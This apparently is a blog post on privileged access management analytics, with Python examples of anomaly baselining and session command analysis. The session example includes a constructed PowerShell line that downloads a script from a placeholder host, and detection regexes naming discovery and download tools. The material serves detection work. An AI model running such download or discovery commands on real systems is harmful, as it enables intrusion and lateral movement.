Most PAM conversations start and end with the vault. But a vault is a storage and access control system — not a detection system. The half of the program most organizations are missing is the part that tells you when something is going wrong.
Most PAM conversations start and end with the vault. Get credentials out of spreadsheets and into a managed system. Rotate passwords. Enforce MFA on privileged accounts. Control who can check out what. That is the foundation, and it is the right place to start.
But a vault is a storage and access control system. It is not a detection system. And in 2026, the organizations that treat their PAM deployment as complete once the vault is running are missing the half of the program that actually tells you when something is going wrong.
Why It Matters
Consider what happened in May 2026 with the FortiClient EMS campaign. Threat actors exploited a critical pre-authentication vulnerability to achieve privilege escalation, then disguised a credential-stealing payload as a legitimate endpoint update and delivered it silently through PowerShell across managed endpoints. The entry point was a trusted management system. The delivery mechanism looked like normal administrative activity. The credentials harvested were real, valid, and indistinguishable from authorized use once in an attacker's hands.
A vault stores those credentials securely. A vault does not tell you that the account checking them out at 2am is doing something it has never done before. A vault does not flag that a privileged session that normally touches three servers suddenly accessed forty. A vault does not surface the pattern that connects a credential checkout to a lateral movement event forty minutes later.
That is what analytics does. And without it, your PAM program has a significant blind spot at exactly the moment it matters most — after a credential has been compromised and the attacker is using it.
The PAM Lesson
PAM analytics is not a separate product bolted onto a vault. It is the visibility layer that makes the entire PAM investment meaningful as a security control rather than just a compliance checkbox.
The starting point is behavioral baselining. Every privileged account has a normal pattern — what systems it accesses, what times it operates, what commands it runs, what volumes of data it touches. Establishing that baseline is what makes anomalies visible. Without it, you are watching a stream of privileged activity with no frame of reference for what normal looks like.
Anomaly detection builds on that baseline. An account that has never authenticated from a European IP address suddenly doing so at 3am is an anomaly. A service account that runs the same three queries every night suddenly executing a bulk export is an anomaly. A privileged user checking out credentials for a system they have never touched is an anomaly. None of these are automatically malicious. All of them are worth a second look. The value of anomaly detection is not generating alerts — it is generating the right alerts at the right time with enough context to act on.
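As an added illustration of the baselining and anomaly logic described above (example code, not from the original article or any PAM product), the following Python builds a per-account baseline from constructed checkout events and scores new events against it for the deviations the text names: new source country, off-hours activity, a never-seen target host, and host fan-out well beyond normal. The event fields, account names and the 3x fan-out multiplier are assumptions.

```python
from collections import defaultdict
from datetime import datetime

# Constructed PAM events (not real data): (account, ISO timestamp, source country, target host).
BASELINE_EVENTS = [
    ("svc-backup", "2026-05-01T23:10:00", "US", "db01"),
    ("svc-backup", "2026-05-02T23:12:00", "US", "db02"),
    ("svc-backup", "2026-05-03T23:11:00", "US", "db03"),
    ("admin-jlee", "2026-05-01T09:30:00", "US", "web01"),
    ("admin-jlee", "2026-05-02T14:05:00", "US", "web02"),
]
NEW_EVENTS = [
    ("admin-jlee", "2026-05-10T03:02:00", "DE", "web01"),  # known host, but new country and off-hours
    ("svc-backup", "2026-05-10T23:15:00", "US", "db01"),   # its usual nightly pattern
    ("svc-backup", "2026-05-10T23:16:00", "US", "db02"),
    ("svc-backup", "2026-05-10T23:17:00", "US", "db03"),
    ("svc-backup", "2026-05-10T23:18:00", "US", "fs01"),   # never-seen host, and fan-out beyond normal
]

def build_baseline(events):
    """Per account: hosts, source countries and hours seen, and distinct hosts touched per day."""
    base = defaultdict(lambda: {"hosts": set(), "countries": set(), "hours": set(), "per_day": defaultdict(set)})
    for acct, ts, country, host in events:
        t, p = datetime.fromisoformat(ts), base[acct]
        p["hosts"].add(host); p["countries"].add(country); p["hours"].add(t.hour)
        p["per_day"][t.date()].add(host)
    return base

def score_event(base, acct, ts, country, host, hosts_today):
    """Reasons an event deviates from the account's baseline; an empty list means it looks normal."""
    p = base.get(acct)
    if p is None: return ["unknown_account"]  # no baseline at all is itself worth a look
    max_per_day = max(len(h) for h in p["per_day"].values())
    checks = [
        (country not in p["countries"], "new_source_country"),
        (host not in p["hosts"], "new_target_host"),
        (datetime.fromisoformat(ts).hour not in p["hours"], "off_hours"),
        (hosts_today > 3 * max_per_day, "host_fanout_spike"),  # 3x multiplier is an assumed tuning value
    ]
    return [name for hit, name in checks if hit]

def detect(base, events):
    """Score a stream of new events in order, tracking distinct hosts per account per day."""
    hosts_today, hits = defaultdict(set), []
    for acct, ts, country, host in events:
        key = (acct, datetime.fromisoformat(ts).date())
        hosts_today[key].add(host)
        if reasons := score_event(base, acct, ts, country, host, len(hosts_today[key])):
            hits.append(((acct, ts, country, host), reasons))
    return hits
```

Running `detect(build_baseline(BASELINE_EVENTS), NEW_EVENTS)` flags only the 3am login from a new country and the fourth host touched by the backup account; the three nightly database checkouts score as normal.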
Session analytics closes the loop on what privileged accounts actually do during the sessions they open. Keystroke logging, command analysis, and screen recording are not just audit trail features — they are the raw material for detection. A session that starts with normal administrative commands and then runs a discovery scan followed by a PowerShell download is a story you can read in real time if the analytics layer is watching it. Without session analytics, that story only becomes visible in a post-breach forensics exercise, which is the worst possible time to read it.
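An added example (not code from the original article) of reading the session story described above in real time: it tags each command of a constructed session transcript by stage and alerts only when a download follows domain discovery within a time window, so a lone download during routine administration does not page anyone. The command patterns, the transcript and the 15-minute window are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed transcript of one privileged session (not real data): (ISO timestamp, command as typed).
SESSION = [
    ("2026-05-12T10:00:05", "Get-Service -Name Spooler"),
    ("2026-05-12T10:01:10", "Restart-Service -Name Spooler"),
    ("2026-05-12T10:04:30", "net view /domain"),
    ("2026-05-12T10:04:50", "nltest /dclist:corp"),
    ("2026-05-12T10:07:02", "Invoke-WebRequest -Uri http://updates.example.invalid/agent.ps1 -OutFile C:\\Temp\\agent.ps1"),
]

# Ordered stages of the story in the text: domain/network discovery, then a download from inside the session.
STAGES = [
    ("discovery", re.compile(r"^\s*(net\s+view|nltest|Get-ADComputer|Get-ADDomainController)\b", re.I)),
    ("download", re.compile(r"\b(Invoke-WebRequest|iwr|Start-BitsTransfer|DownloadString)\b", re.I)),
]

def analyze_session(session, window=timedelta(minutes=15)):
    """Tag each command with its stage; alert when a download follows discovery within `window`.

    A download on its own is routine admin work; it is the ordered chain that earns the alert."""
    last_discovery = None
    tagged = []
    for ts, cmd in session:
        t = datetime.fromisoformat(ts)
        for stage, rx in STAGES:
            if rx.search(cmd):
                tagged.append((stage, ts, cmd))
                if stage == "discovery":
                    last_discovery = t
                elif stage == "download" and last_discovery is not None and t - last_discovery <= window:
                    return {"alert": True, "stages": [s for s, _, _ in tagged],
                            "elapsed_s": int((t - last_discovery).total_seconds())}
                break  # one stage per command
    return {"alert": False, "stages": [s for s, _, _ in tagged], "elapsed_s": None}
```

The same chain fed to a SIEM or SOAR as one correlated event, with the tagged commands attached, is the context the text says an alert needs to be actionable.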
Identity Threat Detection and Response — ITDR — represents the maturation of these capabilities into a coordinated detection and response function. ITDR connects the identity layer to the SOC. It correlates privileged access events with threat intelligence, endpoint telemetry, and network activity to surface identity-based attacks as they are happening rather than after the fact. The identity team has always had the data to contribute to detection. ITDR is the operational framework that makes that contribution systematic.
The Visibility Gap
Here is the honest assessment of where most organizations actually are: they have a vault, they have session recording turned on, and nobody is watching the recordings unless something goes wrong.
Session recordings that are never reviewed until after a breach are a forensics capability, not a detection capability. The difference is not the data — it is the analytics layer that processes that data continuously and surfaces the events worth human attention before the breach becomes obvious.
This is the gap between PAM as a compliance control and PAM as a security control. Compliance requires that you have the audit trail. Security requires that someone — or something — is actually analyzing it.
The organizations that have closed this gap share a few common characteristics. They have defined what normal privileged activity looks like in their environment and documented it. They have configured alerting on deviations from that baseline rather than waiting for manual review. They have connected their PAM platform's analytics output to their SIEM or SOAR so privileged access events are part of the same detection workflow as everything else. And they treat privileged account anomalies with the same urgency as endpoint alerts — because in most breach scenarios, they are the same event observed from a different angle.
What to Check This Week
The vault is the foundation. Analytics is what makes it a security program. You cannot defend what you cannot see, and right now most organizations can see the credential sitting in the vault far more clearly than they can see what happens after it leaves.